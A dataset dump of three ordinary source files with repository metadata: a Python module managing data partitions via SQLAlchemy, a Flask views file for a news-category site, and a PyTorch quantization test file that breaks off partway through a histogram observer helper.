11942764d3444e239ed6702bca9c874ab630237e | f41bd639f249ef6029e310bee84c6ef03f5d6f19 | /databundles/partitions.py | b4ecea0136dac5ddfa498ccb0c0969a76a298626 | [] | no_license | kball/databundles | 5e3d478c1977a0481d77131dd573c8f199e2c95d | 142f20705c8be6cb136adef3a94c8fa7b7119b88 | refs/heads/master | 2021-01-21T03:30:32.822333 | 2014-01-23T23:57:57 | 2014-01-23T23:57:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,722 | py | """Access classess and identity for partitions.
Copyright (c) 2013 Clarinova. This file is licensed under the terms of the
Revised BSD License, included in this distribution as LICENSE.txt
"""
import os
from partition import PartitionIdentity
from sqlalchemy.orm.exc import NoResultFound
class Partitions(object):
'''Continer and manager for the set of partitions.
This object is always accessed from Bundle.partitions""
'''
def __init__(self, bundle):
self.bundle = bundle
def partition(self, arg, **kwargs):
'''Get a local partition object from either a Partion ORM object, or
a partition name
Arguments:
arg -- a orm.Partition or Partition object.
'''
from databundles.orm import Partition as OrmPartition
from databundles.identity import PartitionNumber
from partition import PartitionIdentity
from sqlalchemy import or_
from sqlalchemy.util._collections import KeyedTuple
from partition import new_partition
session = self.bundle.database.session
if isinstance(arg,OrmPartition):
orm_partition = arg
elif isinstance(arg, basestring):
orm_partition = session.query(OrmPartition).filter(or_(OrmPartition.id_==arg,OrmPartition.vid==arg)).one()
elif isinstance(arg, PartitionNumber):
orm_partition = session.query(OrmPartition).filter(OrmPartition.id_==str(arg) ).one()
elif isinstance(arg, PartitionIdentity):
orm_partition = session.query(OrmPartition).filter(OrmPartition.id_==str(arg.id_) ).one()
else:
raise ValueError("Arg must be a Partition or PartitionNumber. Got {}".format(type(arg)))
return new_partition(self.bundle, orm_partition, **kwargs)
@property
def count(self):
from databundles.orm import Partition as OrmPartition
return (self.bundle.database.session.query(OrmPartition)
.filter(OrmPartition.d_vid == self.bundle.dataset.vid)).count()
@property
def all(self): #@ReservedAssignment
'''Return an iterator of all partitions'''
from databundles.orm import Partition as OrmPartition
import sqlalchemy.exc
try:
ds = self.bundle.dataset
q = (self.bundle.database.session.query(OrmPartition)
.filter(OrmPartition.d_vid == ds.vid)
.order_by(OrmPartition.vid.asc())
.order_by(OrmPartition.segment.asc()))
return [self.partition(op) for op in q.all()]
except sqlalchemy.exc.OperationalError:
raise
return []
@property
def all_nocsv(self): #@ReservedAssignment
'''Return an iterator of all partitions, excluding CSV format partitions'''
from databundles.orm import Partition as OrmPartition
import sqlalchemy.exc
try:
ds = self.bundle.dataset
q = (self.bundle.database.session.query(OrmPartition)
.filter(OrmPartition.d_vid == ds.vid)
.filter(OrmPartition.format != 'csv')
.order_by(OrmPartition.vid.asc())
.order_by(OrmPartition.segment.asc()))
return [self.partition(op) for op in q.all()]
except sqlalchemy.exc.OperationalError:
raise
return []
def __iter__(self):
return iter(self.all)
def get(self, id_):
'''Get a partition by the id number
Arguments:
id_ -- a partition id value
Returns:
A partitions.Partition object
Throws:
a Sqlalchemy exception if the partition either does not exist or
is not unique
Because this method works on the bundle, it the id_ ( without version information )
is equivalent to the vid ( with version information )
'''
from databundles.orm import Partition as OrmPartition
from sqlalchemy import or_
if isinstance(id_, PartitionIdentity):
id_ = id_.identity.id_
s = self.bundle.database.session
q = (s
.query(OrmPartition)
.filter(or_(
OrmPartition.id_==str(id_).encode('ascii'),
OrmPartition.vid==str(id_).encode('ascii')
)))
try:
orm_partition = q.one()
return self.partition(orm_partition)
except NoResultFound:
orm_partition = None
if not orm_partition:
q = (s.query(OrmPartition)
.filter(OrmPartition.name==id_.encode('ascii')))
try:
orm_partition = q.one()
return self.partition(orm_partition)
except NoResultFound:
orm_partition = None
return orm_partition
def find_table(self, table_name):
'''Return the first partition that has the given table name'''
for partition in self.all:
if partition.table and partition.table.name == table_name:
return partition
return None
def find_id(self, id_):
'''Find a partition from an id or vid'''
from databundles.orm import Partition as OrmPartition
from sqlalchemy import or_
q = (self.bundle.database.session.query(OrmPartition)
.filter(or_(
OrmPartition.id_==str(id_).encode('ascii'),
OrmPartition.vid==str(id_).encode('ascii')
)))
return q.first()
def find(self, pid=None, use_library=False, **kwargs):
'''Return a Partition object from the database based on a PartitionId.
The object returned is immutable; changes are not persisted'''
import sqlalchemy.orm.exc
from identity import Identity
try:
if pid and not pid.format:
pid.format = Identity.ANY
elif not 'format' in kwargs:
kwargs['format'] = Identity.ANY
partitions = [ self.partition(op, memory=kwargs.get('memory',False))
for op in self._find_orm(pid, **kwargs).all()];
if len(partitions) == 1:
p = partitions.pop()
if use_library and not p.database.exists:
# Try to get it from the library, if it exists.
b = self.bundle.library.get(p.identity.vname)
if not b or not b.partition:
return p
else:
return b.partition
else:
return p
elif len(partitions) > 1 :
from databundles.dbexceptions import ResultCountError
rl = "; ".join([p.identity.vname for p in partitions])
raise ResultCountError("Got too many results: {}".format(rl))
else:
return None
except sqlalchemy.orm.exc.NoResultFound:
return None
def find_all(self, pid=None, **kwargs):
'''Return a Partition object from the database based on a PartitionId.
The object returned is immutable; changes are not persisted'''
from identity import Identity
if pid and not pid.format:
pid.format = Identity.ANY
elif not 'format' in kwargs:
kwargs['format'] = Identity.ANY
ops = self._find_orm(pid, **kwargs).all()
return [ self.partition(op) for op in ops]
def _pid_or_args_to_pid(self, bundle, pid, args):
from databundles.identity import Identity, new_identity
if isinstance(pid, Identity):
return pid, None
elif isinstance(pid,basestring):
return None, pid # pid is actually the name
elif args.get('name', False):
return None, args.get('name', None)
else:
return new_identity(args, bundle=bundle), None
def _find_orm(self, pid=None, **kwargs):
'''Return a Partition object from the database based on a PartitionId.
An ORM object is returned, so changes can be persisted. '''
import sqlalchemy.orm.exc
from databundles.identity import Identity
from databundles.orm import Partition as OrmPartition
pid, name = self._pid_or_args_to_pid(self.bundle, pid, kwargs)
q = self.bundle.database.session.query(OrmPartition)
if name is not None:
q = q.filter(OrmPartition.name==name)
else:
if pid.time is not Identity.ANY:
q = q.filter(OrmPartition.time==pid.time)
if pid.space is not Identity.ANY:
q = q.filter(OrmPartition.space==pid.space)
if pid.grain is not Identity.ANY:
q = q.filter(OrmPartition.grain==pid.grain)
if pid.format is not Identity.ANY:
q = q.filter(OrmPartition.format==pid.format)
if pid.segment is not Identity.ANY:
q = q.filter(OrmPartition.segment==pid.segment)
if pid.table is not Identity.ANY:
if pid.table is None:
q = q.filter(OrmPartition.t_id==None)
else:
tr = self.bundle.schema.table(pid.table)
if not tr:
raise ValueError("Didn't find table named {} in {} bundle path = {}".format(pid.table, pid.vname, self.bundle.database.path))
q = q.filter(OrmPartition.t_id==tr.id_)
ds = self.bundle.dataset
q = q.filter(OrmPartition.d_vid == ds.vid)
q = q.order_by(OrmPartition.vid.asc()).order_by(OrmPartition.segment.asc())
return q
def _new_orm_partition(self, pid, **kwargs):
'''Create a new ORM Partrition object, or return one if
it already exists '''
from databundles.orm import Partition as OrmPartition, Table
session = self.bundle.database.session
if pid.table:
q =session.query(Table).filter( (Table.name==pid.table) | (Table.id_==pid.table) )
table = q.one()
else:
table = None
# 'tables' are additional tables that are part of the partion ,beyond the one in the identity
# Probably a bad idea.
tables = kwargs.get('tables',kwargs.get('table',pid.table if pid else None))
if tables and not isinstance(tables, (list,tuple)):
tables = [tables]
if tables and pid and pid.table and pid.table not in tables:
tables = list(tables)
tables.append(pid.table)
data=kwargs.get('data',{})
data['tables'] = tables
d = pid.to_dict()
if not 'format' in d:
d['format'] = kwargs.get('format', 'db')
try: del d['table'] # OrmPartition requires t_id instead
except: pass
if 'dataset' in d:
del d['dataset']
# This code must have the session established in the context be active.
op = OrmPartition(
self.bundle.get_dataset(session),
t_id = table.id_ if table else None,
data=data,
state=kwargs.get('state',None),
**d
)
session.add(op)
if not op.format:
raise Exception("Must have a format!")
return op
def clean(self, session):
from databundles.orm import Partition as OrmPartition
session.query(OrmPartition).delete()
def _new_partition(self, pid=None, session = None,**kwargs):
'''Creates a new OrmPartition record'''
with self.bundle.session:
pid, _ = self._pid_or_args_to_pid(self.bundle, pid, kwargs)
extant = self._find_orm(pid, **kwargs).all()
for p in extant:
if p.name == pid.name:
return self.partition(p)
op = self._new_orm_partition(pid, **kwargs)
# Return the partition from the managed session, which prevents the
# partition from being tied to a session that is closed.
return self.find(pid)
def new_partition(self, pid=None, **kwargs):
return self.new_db_partition( pid, **kwargs)
def new_db_partition(self, pid=None, **kwargs):
if pid:
pid.format = 'db'
else:
kwargs['format'] = 'db'
p = self._new_partition(pid, **kwargs)
p.create()
return p
def new_geo_partition(self, pid=None, **kwargs):
from sqlalchemy.orm.exc import NoResultFound
if pid:
pid.format = 'geo'
else:
kwargs['format'] = 'geo'
# We'll need to load a table from the shapefile, so that has to be created before
# we create the partition.
table_name = kwargs.get('table',pid.table if pid else None)
if not table_name:
raise ValueError("Pid must have a table name")
try:
self.bundle.schema.table(table_name)
except NoResultFound:
with self.bundle.session:
t = self.bundle.schema.add_table(table_name)
p = self._new_partition(pid, **kwargs)
if kwargs.get('shape_file'):
p.load_shapefile( kwargs.get('shape_file'), **kwargs)
return p
def new_hdf_partition(self, pid=None, **kwargs):
if pid:
pid.format = 'hdf'
else:
kwargs['format'] = 'hdf'
return self._new_partition(pid, **kwargs)
def new_csv_partition(self, pid=None, **kwargs):
if pid:
pid.format = 'csv'
else:
kwargs['format'] = 'csv'
return self._new_partition(pid, **kwargs)
def find_or_new(self, pid=None, clean = False, **kwargs):
return self.find_or_new_db(pid, clean = False, **kwargs)
def find_or_new_db(self, pid=None, clean = False, **kwargs):
'''Find a partition identified by pid, and if it does not exist, create it.
Args:
pid A partition Identity
tables String or array of tables to copy form the main partition
'''
if pid:
pid.format = 'db'
else:
kwargs['format'] = 'db'
try: partition = self.find(pid **kwargs)
except: partition = None
if partition:
return partition
tables = kwargs.get('tables',kwargs.get('table',pid.table if pid else None))
if tables and not isinstance(tables, (list,tuple)):
tables = [tables]
if tables and pid and pid.table and pid.table not in tables:
tables.append(partition.identity.table)
partition = self._new_partition(pid, **kwargs)
if tables:
partition.create_with_tables(tables, clean)
else:
partition.create()
return partition;
def find_or_new_geo(self, pid=None, **kwargs):
'''Find a partition identified by pid, and if it does not exist, create it.
Args:
pid A partition Identity
tables String or array of tables to copy form the main partition
'''
if pid:
pid.format = 'geo'
else:
kwargs['format'] = 'geo'
try: partition = self.find(pid, **kwargs)
except: partition = None
if partition:
return partition
tables = kwargs.get('tables',kwargs.get('table',pid.table if pid else None))
if tables and not isinstance(tables, (list,tuple)):
tables = [tables]
if tables and pid and pid.table and pid.table not in tables:
tables.append(partition.identity.table)
partition = self.new_geo_partition(pid, **kwargs)
if tables:
partition.create_with_tables(tables)
else:
partition.create()
return partition;
def find_or_new_hdf(self, pid=None, **kwargs):
'''Find a partition identified by pid, and if it does not exist, create it.
Args:
pid A partition Identity
tables String or array of tables to copy form the main partition
'''
if pid:
pid.format = 'hdf'
else:
kwargs['format'] = 'hdf'
try: partition = self.find(pid, **kwargs)
except: partition = None
if partition:
return partition
partition = self.new_hdf_partition(pid, **kwargs)
return partition;
def find_or_new_csv(self, pid=None, **kwargs):
'''Find a partition identified by pid, and if it does not exist, create it.
Args:
pid A partition Identity
tables String or array of tables to copy form the main partition
'''
if pid:
pid.format = 'csv'
else:
kwargs['format'] = 'csv'
try: partition = self.find(pid, **kwargs)
except: partition = None
if partition:
return partition
partition = self.new_csv_partition(pid, **kwargs)
return partition;
def delete(self, partition):
from databundles.orm import Partition as OrmPartition
q = (self.bundle.database.session.query(OrmPartition)
.filter(OrmPartition.id_==partition.identity.id_))
q.delete()
| [
"[email protected]"
] | |
03c5e284066da9d303f45f391c6d39151fb59a4b | 6be2b9c3a7dcc95ed04ce8a5af912014833b769a | /app/main/views.py | 7bd0437c264b1feb1213cb896371a4b80751cd1f | [
"MIT"
] | permissive | MaryMbugua/Newshighlighttwo | 05219428c9e568122cb59f7a2ea90b758edf8c76 | 143fd75b7c0e36a48e25240ff150d10781c77470 | refs/heads/master | 2020-03-08T19:47:28.086076 | 2018-04-23T08:50:25 | 2018-04-23T08:50:25 | 128,363,872 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,157 | py | from flask import render_template,request,redirect,url_for
from . import main
from ..requests import get_sources,get_articles
from ..models import Newsarticle,Newssources
#views
@main.route('/')
def index():
'''
view root page function that returns the index page and its data
'''
title = 'Home - Welcome to The best News Update Website Online'
return render_template('index.html',title = title)
@main.route('/Business/')
def BusinessSources():
'''
view page function that returns business news from various news sources
'''
business_sources = get_sources('business')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('biz.html',title = title,biznews = business_sources)
@main.route('/Entertainment/')
def EntertainmentSources():
'''
view page function that returns entertainment news from various news sources
'''
entertainment_sources = get_sources('entertainment')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('enta.html',title = title,enta = entertainment_sources)
@main.route('/Health/')
def HealthSources():
'''
view page function that returns health news from various news sources
'''
health_sources = get_sources('health')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('health.html',title = title,healthsource = health_sources)
@main.route('/General/')
def GeneralSources():
'''
view page function that returns general news from various news sources
'''
general_sources = get_sources('general')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('gen.html',title = title,general = general_sources)
@main.route('/Science/')
def ScienceSources():
'''
view page function that returns science news from various news sources
'''
science_sources = get_sources('science')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('science.html',title = title,science = science_sources)
@main.route('/Sports/')
def SportsSources():
'''
view page function that returns sports news from various news sources
'''
sports_sources = get_sources('sports')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('sports.html',title = title,sports = sports_sources)
@main.route('/Technology/')
def TechnologySources():
'''
view page function that returns technology news from various news sources
'''
technology_sources = get_sources('technology')
title = 'Home - Welcome to The best News Update Website Online'
return render_template('tech.html',title = title,tech = technology_sources)
@main.route('/source/<id>/')
def NewsGetArticles(id):
'''
view page function that returns technology news from various news sources
'''
news = get_articles(id)
title = 'Home - Welcome to The best News Update Website Online'
return render_template('article.html',title = title,news=news) | [
"[email protected]"
] | |
aa49d86c34cb6af174c81aed810cf64c87dfa51a | 5b1cd15a172e5a458f60506c76c8a303656f6a4c | /test/quantization/test_workflow_module.py | 5e0b3e2db6d66e8d8540246746bd4ef2e7dce193 | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | georgeSkoumas/pytorch | 8350b446968a3dc6ed0eccacdffafae60bc1d17b | d39cb84f1fffbb9a1b909be7b203e673c046cca1 | refs/heads/master | 2022-12-01T21:53:49.847675 | 2020-08-13T12:11:44 | 2020-08-13T12:14:21 | 287,285,967 | 1 | 0 | NOASSERTION | 2020-08-13T13:21:15 | 2020-08-13T13:21:15 | null | UTF-8 | Python | false | false | 69,044 | py | # Torch
import torch
from torch.quantization import (
MinMaxObserver,
PerChannelMinMaxObserver,
MovingAverageMinMaxObserver,
MovingAveragePerChannelMinMaxObserver,
MinMaxDynamicQuantObserver,
HistogramObserver,
RecordingObserver,
FakeQuantize,
default_debug_qconfig,
default_observer,
default_per_channel_weight_observer,
get_observer_dict,
prepare,
)
from torch.quantization._learnable_fake_quantize import (
_LearnableFakeQuantizePerTensorOp,
_LearnableFakeQuantizePerChannelOp
)
import torch.nn as nn
# Standard library
import copy
import io
import unittest
import math
import numpy as np
# Testing utils
from hypothesis import given, settings
from hypothesis import strategies as st
import torch.testing._internal.hypothesis_utils as hu
hu.assert_deadline_disabled()
from torch.testing._internal.common_cuda import TEST_MULTIGPU, TEST_CUDA
from torch.testing._internal.common_utils import TestCase
from torch.testing._internal.common_quantization import (
QuantizationTestCase,
AnnotatedSingleLayerLinearModel,
test_only_eval_fn,
)
from torch.testing._internal.common_quantized import (
override_quantized_engine,
supported_qengines,
override_qengines,
)
# Reference method for fake quantize
def _fake_quantize_per_tensor_affine_reference(X, scale, zero_point, quant_min, quant_max):
res = (torch.clamp(torch.round(X * (1.0 / scale) + zero_point), quant_min, quant_max) - zero_point) * scale
return res
# Reference method for the gradient of the fake quantize operator
def _fake_quantize_per_tensor_affine_grad_reference(dY, X, scale, zero_point, quant_min, quant_max):
Xq = torch.round(X * (1.0 / scale) + zero_point)
mask = (Xq >= quant_min) * (Xq <= quant_max)
res = torch.zeros_like(dY)
res[mask] = dY[mask]
return res
# Reference method for the gradients of the fake quantize operator
def _fake_quantize_learnable_per_tensor_affine_grad_reference(dY, X, scale, zero_point, quant_min, quant_max, device):
r"""This method references the following literatures for back propagation on scale and zero point.
- https://arxiv.org/pdf/1902.08153.pdf
- https://arxiv.org/pdf/1903.08066.pdf
"""
zero_point_rounded = int((zero_point + 0.5).clamp(quant_min, quant_max).item())
Xq = torch.round(X * (1.0 / scale) + zero_point_rounded).clamp(quant_min, quant_max)
Xfq = (Xq - zero_point_rounded) * scale
indicate_small_scale = (Xq == quant_min).float().to(device)
indicate_big_scale = (Xq == quant_max).float().to(device)
indicate_middle_scale = torch.ones(indicate_small_scale.shape).to(device) - \
indicate_small_scale - indicate_big_scale
indicate_saturate_zp = ((Xq == quant_min).float() + (Xq == quant_max).float()).to(device)
indicate_unsaturate_zp = torch.ones(indicate_saturate_zp.shape).to(device) - indicate_saturate_zp
grad_small_scale = quant_min - zero_point_rounded
grad_big_scale = quant_max - zero_point_rounded
grad_middle_scale = ((Xfq - X) / scale).to(device)
grad_saturate_zp = -scale.to(device)
grad_unsaturate_zp = 0
grad_scale = indicate_small_scale * grad_small_scale + \
indicate_big_scale * grad_big_scale + \
indicate_middle_scale * grad_middle_scale
grad_zp = indicate_saturate_zp * grad_saturate_zp + \
indicate_unsaturate_zp * grad_unsaturate_zp
grad_X = _fake_quantize_per_tensor_affine_grad_reference(
dY, X, scale, zero_point, quant_min, quant_max).to(device)
grad_scale = (grad_scale * dY).sum().unsqueeze(dim=0)
grad_zp = (grad_zp * dY).sum().unsqueeze(dim=0)
return grad_X, grad_scale, grad_zp
# Helper function used to simulate per-channel fake-quant against any axis
def _permute_to_axis_zero(X, axis):
new_axis_list = list(range(X.dim()))
new_axis_list[axis] = 0
new_axis_list[0] = axis
y = X.permute(tuple(new_axis_list))
return y, new_axis_list
# Reference method for fake quantize
def _fake_quantize_per_channel_affine_reference(X, per_channel_scale, per_channel_zero_point, axis, quant_min, quant_max):
X, permute_axis_list = _permute_to_axis_zero(X, axis)
res = torch.zeros_like(X)
for i in range(X.size()[0]):
res[i] = (torch.clamp(torch.round(X[i] * (1.0 / per_channel_scale[i]) +
per_channel_zero_point[i]), quant_min, quant_max) - per_channel_zero_point[i]) * per_channel_scale[i]
out = res.permute(tuple(permute_axis_list))
return out
# Reference method for the gradient of the fake quantize operator
def _fake_quantize_per_channel_affine_grad_reference(dY, X, per_channel_scale, per_channel_zero_point, axis, quant_min, quant_max):
X, permute_axis_list = _permute_to_axis_zero(X, axis)
Xq = torch.zeros_like(X)
for i in range(X.size()[0]):
Xq[i] = torch.round(X[i] * (1.0 / per_channel_scale[i]) + per_channel_zero_point[i])
Xq = Xq.permute(tuple(permute_axis_list))
mask = (Xq >= quant_min) * (Xq <= quant_max)
res = torch.zeros_like(dY)
res[mask] = dY[mask]
return res
# Reference method for quantization.
def _quantize_per_tensor(x, scale, zero_point, quant_min, quant_max):
return ((x / scale) + zero_point).round().clamp(quant_min, quant_max)
# Reference method for the per channel gradients of the learnable fake quantize operator
def _fake_quantize_learnable_per_channel_affine_grad_reference(
dY, X, per_channel_scale, per_channel_zero_point, axis, quant_min, quant_max, device):
r"""This method references the following literatures for back propagation on scale and zero point.
- https://arxiv.org/pdf/1902.08153.pdf
- https://arxiv.org/pdf/1903.08066.pdf
"""
grad_X = _fake_quantize_per_channel_affine_grad_reference(
dY, X, per_channel_scale, per_channel_zero_point, axis, quant_min, quant_max).to(device)
per_channel_scale = per_channel_scale.detach().type(torch.float)
per_channel_zero_point = ((per_channel_zero_point.detach() + 0.5).clamp(quant_min, quant_max)).type(torch.int64)
grad_scale = torch.zeros([per_channel_scale.size(0)]).to(device)
grad_zero_point = torch.zeros([per_channel_zero_point.size(0)]).to(device)
X_flattened = torch.unbind(X, dim=axis)
dY_flattened = torch.unbind(dY, dim=axis)
for i, X_i in enumerate(torch.unbind(X, dim=axis), 0):
scale_i = per_channel_scale[i]
zero_point_i = per_channel_zero_point[i]
X_i = X_flattened[i]
dY_i = dY_flattened[i]
Xq_i = _quantize_per_tensor(
X_i, scale_i, zero_point_i, quant_min, quant_max).to(device)
Xfq_i = (Xq_i - zero_point_i) * scale_i
indicate_small_scale_i = (Xq_i == quant_min).float().to(device)
indicate_big_scale_i = (Xq_i == quant_max).float().to(device)
indicate_middle_scale_i = torch.ones(indicate_small_scale_i.shape).to(device) - \
indicate_small_scale_i - indicate_big_scale_i
indicate_saturate_zp_i = ((Xq_i == quant_min).float() +
(Xq_i == quant_max).float()).to(device)
indicate_unsaturate_zp_i = torch.ones(indicate_saturate_zp_i.shape).to(device) - \
indicate_saturate_zp_i
grad_small_scale_i = quant_min - zero_point_i
grad_big_scale_i = quant_max - zero_point_i
grad_middle_scale_i = ((Xfq_i - X_i) / scale_i).to(device)
grad_saturate_zp_i = -scale_i.to(device)
grad_unsaturate_zp_i = 0
grad_scale_i = indicate_small_scale_i * grad_small_scale_i + \
indicate_middle_scale_i * grad_middle_scale_i + \
indicate_big_scale_i * grad_big_scale_i
grad_zp_i = indicate_saturate_zp_i * grad_saturate_zp_i + \
indicate_unsaturate_zp_i * grad_unsaturate_zp_i
grad_scale_i = (grad_scale_i * dY_i).sum().unsqueeze(dim=0)
grad_zp_i = (grad_zp_i * dY_i).sum().unsqueeze(dim=0)
grad_scale[i] = grad_scale_i
grad_zero_point[i] = grad_zp_i
return grad_X, grad_scale, grad_zero_point
def to_tensor(X, device):
return torch.tensor(X).to(device=torch.device(device), dtype=torch.float32)
NP_RANDOM_SEED = 19
tolerance = 1e-6
class TestObserver(QuantizationTestCase):
@given(qdtype=st.sampled_from((torch.qint8, torch.quint8)),
qscheme=st.sampled_from((torch.per_tensor_affine, torch.per_tensor_symmetric)),
reduce_range=st.booleans())
def test_per_tensor_observers(self, qdtype, qscheme, reduce_range):
# reduce_range cannot be true for symmetric quantization with uint8
if qdtype == torch.quint8 and qscheme == torch.per_tensor_symmetric:
reduce_range = False
ObserverList = [MinMaxObserver(dtype=qdtype, qscheme=qscheme, reduce_range=reduce_range),
MovingAverageMinMaxObserver(averaging_constant=0.5,
dtype=qdtype,
qscheme=qscheme,
reduce_range=reduce_range)]
for myobs in ObserverList:
# Calculate Qparams should return with a warning for observers with no data
qparams = myobs.calculate_qparams()
if type(myobs) == MinMaxObserver:
x = torch.tensor([1.0, 2.0, 2.0, 3.0, 4.0, 5.0, 6.0])
y = torch.tensor([4.0, 5.0, 5.0, 6.0, 7.0, 8.0])
else:
# Moving average of min/max for x and y matches that of
# extreme values for x/y used for minmax observer
x = torch.tensor([0.0, 2.0, 2.0, 3.0, 4.0, 5.0, 6.0])
y = torch.tensor([2.0, 5.0, 5.0, 6.0, 7.0, 10.0])
result = myobs(x)
result = myobs(y)
self.assertEqual(result, y)
self.assertEqual(myobs.min_val, 1.0)
self.assertEqual(myobs.max_val, 8.0)
qparams = myobs.calculate_qparams()
if reduce_range:
if qscheme == torch.per_tensor_symmetric:
ref_scale = 0.062745 * 255 / 127
ref_zero_point = 0 if qdtype is torch.qint8 else 128
else:
ref_scale = 0.0313725 * 255 / 127
ref_zero_point = -64 if qdtype is torch.qint8 else 0
else:
if qscheme == torch.per_tensor_symmetric:
ref_scale = 0.062745
ref_zero_point = 0 if qdtype is torch.qint8 else 128
else:
ref_scale = 0.0313725
ref_zero_point = -128 if qdtype is torch.qint8 else 0
self.assertEqual(qparams[1].item(), ref_zero_point)
self.assertEqual(qparams[0].item(), ref_scale, atol=1e-5, rtol=0)
state_dict = myobs.state_dict()
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_dict[key])
loaded_obs = MinMaxObserver(dtype=qdtype, qscheme=qscheme, reduce_range=reduce_range)
loaded_obs.load_state_dict(loaded_dict)
loaded_qparams = loaded_obs.calculate_qparams()
self.assertEqual(myobs.min_val, loaded_obs.min_val)
self.assertEqual(myobs.max_val, loaded_obs.max_val)
self.assertEqual(myobs.calculate_qparams(), loaded_obs.calculate_qparams())
@given(X=hu.tensor(shapes=hu.array_shapes(min_dims=2, max_dims=4,
min_side=1, max_side=10),
qparams=hu.qparams()),
reduce_range=st.booleans())
def test_per_tensor_dynamic_quant_observers(self, X, reduce_range):
X, (scale, zero_point, torch_type) = X
x = torch.from_numpy(X)
obs = MinMaxDynamicQuantObserver(dtype=torch.quint8, reduce_range=reduce_range)
result = obs(x)
qparams = obs.calculate_qparams()
ref = torch._choose_qparams_per_tensor(x, reduce_range)
self.assertEqual(ref[0], qparams[0])
self.assertEqual(ref[1], qparams[1])
@given(qdtype=st.sampled_from((torch.qint8, torch.quint8)),
qscheme=st.sampled_from((torch.per_channel_affine, torch.per_channel_symmetric)),
ch_axis=st.sampled_from((0, 1, 2, 3)), reduce_range=st.booleans())
def test_per_channel_observers(self, qdtype, qscheme, ch_axis, reduce_range):
# reduce_range cannot be true for symmetric quantization with uint8
if qdtype == torch.quint8 and qscheme == torch.per_channel_symmetric:
reduce_range = False
ObserverList = [PerChannelMinMaxObserver(reduce_range=reduce_range,
ch_axis=ch_axis,
dtype=qdtype,
qscheme=qscheme),
MovingAveragePerChannelMinMaxObserver(averaging_constant=0.5,
reduce_range=reduce_range,
ch_axis=ch_axis,
dtype=qdtype,
qscheme=qscheme)]
for myobs in ObserverList:
# Calculate qparams should work for empty observers
qparams = myobs.calculate_qparams()
x = torch.tensor(
[
[[[1.0, 2.0], [2.0, 2.5]], [[3.0, 4.0], [4.5, 6.0]]],
[[[-4.0, -3.0], [5.0, 5.0]], [[6.0, 3.0], [7.0, 8.0]]],
]
)
if type(myobs) == MovingAveragePerChannelMinMaxObserver:
# Scaling the input tensor to model change in min/max values
# across batches
result = myobs(0.5 * x)
result = myobs(1.5 * x)
self.assertEqual(result, 1.5 * x)
else:
result = myobs(x)
self.assertEqual(result, x)
qparams = myobs.calculate_qparams()
ref_min_vals = [[1.0, -4.0], [-4.0, 3.0], [-4.0, 2.0], [-4.0, -3.0]]
ref_max_vals = [[6.0, 8.0], [5.0, 8.0], [6.0, 8.0], [7.0, 8.0]]
per_channel_symmetric_ref_scales = [
[0.04705882, 0.06274509],
[0.03921569, 0.0627451],
[0.04705882, 0.0627451],
[0.05490196, 0.0627451],
]
per_channel_affine_ref_scales = [
[0.02352941, 0.04705882],
[0.03529412, 0.03137255],
[0.03921569, 0.03137255],
[0.04313726, 0.04313726],
]
per_channel_affine_qint8_zp = [
[-128, -43],
[-15, -128],
[-26, -128],
[-35, -58],
]
per_channel_affine_quint8_zp = [[0, 85], [113, 0], [102, 0], [93, 70]]
self.assertEqual(myobs.min_vals, ref_min_vals[ch_axis])
self.assertEqual(myobs.max_vals, ref_max_vals[ch_axis])
if qscheme == torch.per_channel_symmetric:
ref_scales = per_channel_symmetric_ref_scales[ch_axis]
ref_zero_points = [0, 0] if qdtype is torch.qint8 else [128, 128]
else:
ref_scales = per_channel_affine_ref_scales[ch_axis]
ref_zero_points = (
per_channel_affine_qint8_zp[ch_axis]
if qdtype is torch.qint8
else per_channel_affine_quint8_zp[ch_axis]
)
if reduce_range:
ref_scales = [s * 255 / 127 for s in ref_scales]
ref_zero_points = [math.floor(z / 2) for z in ref_zero_points]
self.assertTrue(torch.allclose(qparams[0], torch.tensor(ref_scales, dtype=qparams[0].dtype)))
self.assertTrue(torch.allclose(qparams[1], torch.tensor(ref_zero_points, dtype=qparams[1].dtype)))
# Test for serializability
state_dict = myobs.state_dict()
b = io.BytesIO()
torch.save(state_dict, b)
b.seek(0)
loaded_dict = torch.load(b)
for key in state_dict:
self.assertEqual(state_dict[key], loaded_dict[key])
loaded_obs = PerChannelMinMaxObserver(reduce_range=reduce_range, ch_axis=ch_axis, dtype=qdtype, qscheme=qscheme)
loaded_obs.load_state_dict(loaded_dict)
loaded_qparams = loaded_obs.calculate_qparams()
self.assertEqual(myobs.min_vals, loaded_obs.min_vals)
self.assertEqual(myobs.max_vals, loaded_obs.max_vals)
self.assertEqual(myobs.calculate_qparams(), loaded_obs.calculate_qparams())
def test_observer_scriptable(self):
obs_list = [MinMaxObserver(), MovingAverageMinMaxObserver(), MinMaxDynamicQuantObserver()]
for obs in obs_list:
scripted = torch.jit.script(obs)
x = torch.rand(3, 4)
obs(x)
scripted(x)
self.assertEqual(obs.calculate_qparams(), scripted.calculate_qparams())
buf = io.BytesIO()
torch.jit.save(scripted, buf)
buf.seek(0)
loaded = torch.jit.load(buf)
self.assertEqual(obs.calculate_qparams(), loaded.calculate_qparams())
# HistogramObserver that works like it does on master
class _ReferenceHistogramObserver(HistogramObserver):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@torch.jit.ignore
def _non_linear_param_search(self):
r"""Non-linear parameter search.
An approximation for L2 error minimization for selecting min/max.
By selecting new min/max, we filter out outliers in input distribution.
This follows the implementation of NormMinimization::NonlinearQuantizationParamsSearch in
caffe2/quantization/server/norm_minimization.cc
"""
def _get_norm(delta_begin, delta_end, density, norm_type):
r"""
Compute the norm of the values uniformaly distributed between
delta_begin and delta_end.
norm = density * (integral_{begin, end} x^2)
= density * (end^3 - begin^3) / 3
"""
assert norm_type == "L2", "Only L2 norms are currently supported"
norm = 0.0
if norm_type == "L2":
norm = (
delta_end * delta_end * delta_end
- delta_begin * delta_begin * delta_begin
) / 3
return density * norm
def _compute_quantization_error(next_start_bin, next_end_bin, norm_type):
r"""
